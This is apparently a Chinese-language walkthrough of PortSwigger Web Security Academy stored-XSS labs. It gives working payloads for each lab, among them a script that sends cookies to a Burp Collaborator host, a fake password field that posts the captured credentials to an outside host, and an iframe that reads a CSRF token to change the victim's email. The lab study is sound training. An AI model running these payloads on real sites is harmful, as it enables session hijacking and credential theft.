Portswigger web security academy：Stored XSS

Stored XSS into HTML context with nothing encoded

• 题目要求

  提交评论，调用alert函数

• 解题过程

  直接祖传payload就行

Stored XSS into anchor href attribute with double quotes HTML-encoded

• 题目描述

  评论功能点有存储型xss

  要求当author name被点击的时候调用alert函数

• 解题过程

  <p>
  
  	<img src="/resources/images/avatarDefault.svg" class="avatar">                     <a id="author" href="https://test.test">name</a> | 24 May 2020
  
  </p>
  

  随便输个链接测试一下，发现输入的website被直接嵌入到了href里

  构造payload：javascript:alert()

Stored DOM XSS

• 题目描述

  评论功能点有存储型dom-xss，调用alert函数即可

• 解题过程

  关键代码

  function escapeHTML(html) {
  
          return html.replace('<', '&lt;').replace('>', '&gt;');
  
  }
  
  let newInnerHtml = firstPElement.innerHTML + escapeHTML(comment.author)
  

  注意这里的escapeHTML函数的定义，使用了replace函数，js的replace函数有个特性，只会替换最开始出现的一个字符，所以

  构造payload：<><img src=x onerror=alert()>

Stored XSS into onclick event with angle brackets and double quotes HTML-encoded and single quotes and backslash escaped

• 题目描述

  评论功能点有存储型xss

  要求当author name被点击的时候调用alert函数

• 解题过程

  这是上上道题的升级版，<>和"会被HTML编码，'和\会被addslash

  关键代码

  <a id="author" href="https://aaaaa\'&quot;`\\" onclick="var tracker={track(){}};tracker.track('https://aaaaa\'&quot;`\\');">asd</a>
  

  可以看到website直接被嵌入到了href和onclick，因为后端检测了url格式，所以href无法进行xss

  看onclick，考虑如何闭合引号，注意到这里是html+js环境，所以可以使用HTML实体编码/unicode编码，但是\会被addslash，所以只能用HTML实体编码

  构造payload：http://xss'-alert()-'

  这里涉及到一个js的知识点，eval('xss'-alert()会弹窗，即js语境中，字符串与语句进行运算，会执行语句

Exploiting cross-site scripting to steal cookies

• 题目描述

  博客评论点有存储型xss

  要求盗取cookie并模拟被盗者身份

• 解题步骤

  这道题要用到Burp Collaborator，这是一个burp自带的测试工具，贴一篇介绍

  简单来说就是一个用来接收并返回数据的接口，类似于自己搭的vps接收cookie

  构造payload：

  <script>
  
  fetch('https://xxxxxx.burpcollaborator.net',{
  
  method:'post',
  
  body:document.cookie
  
  });
  
  </script>
  

  放到评论区，然后在Burp Collaborator Clientpoll一下拿到cookie，再替换掉自己的cookie就可以

Exploiting cross-site scripting to capture passwords

• 题目描述

  在博客评论点有存储型xss

  要求盗取username和password并登录

• 解题过程

  这道题参考了官方的solution，没有过盗取username和password的思路

  <input name=username id=username>
  
  <input type=password name=password onchange="if(this.value.length)fetch('https://4glwxnk77bznm13y44j75a137udl1a.burpcollaborator.net',{
  
  method:'POST',
  
  mode: 'no-cors',
  
  body:username.value+':'+this.value
  
  });">
  

  payload利用了username和password接口，在用户访问页面时自动填写，这里有点脑洞题的感觉，因为这里的赋值是需要后台进行渲染，或者通过get传值的。

  但payload思路可以借鉴

Exploiting XSS to perform CSRF

• 题目描述

  在评论点有存储型xss

  要求修改查看评论的用户的邮件地址

• 解题过程

  先登录给的账号，修改email，用burp看下数据包

  关键部分

  POST /email/change-email HTTP/1.1
  
  Host: accf1faa1fa54c128098504e00910043.web-security-academy.net
  
  Connection: close
  
  Content-Length: 58
  
  Origin: https://accf1faa1fa54c128098504e00910043.web-security-academy.net
  
  Accept-Encoding: gzip, deflate
  
  Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
  
  Cookie: session=hVm5TBng8eVK17OV1ulcF6IP5xbwzcu4
  
  email=aaaa%40bbb.ccc&csrf=aIMl9DOIMdHZQ4qsl05r4dERRyrRzFm6
  

  这里需要一个csrf token，所以要用到iframe

  构造payload：（可行）

  <iframe src='https://accf1faa1fa54c128098504e00910043.web-security-academy.net/email' name='xxx'  onload="
  
  var csrf = window.frames['xxx'].document.getElementsByName('csrf')[0].value;
  
  fetch('https://accf1faa1fa54c128098504e00910043.web-security-academy.net/email/change-email',{
  
  method:'post',
  
  body:'email=aaa@bbb.ccc&csrf='+csrf
  
  });">
  
  </iframe>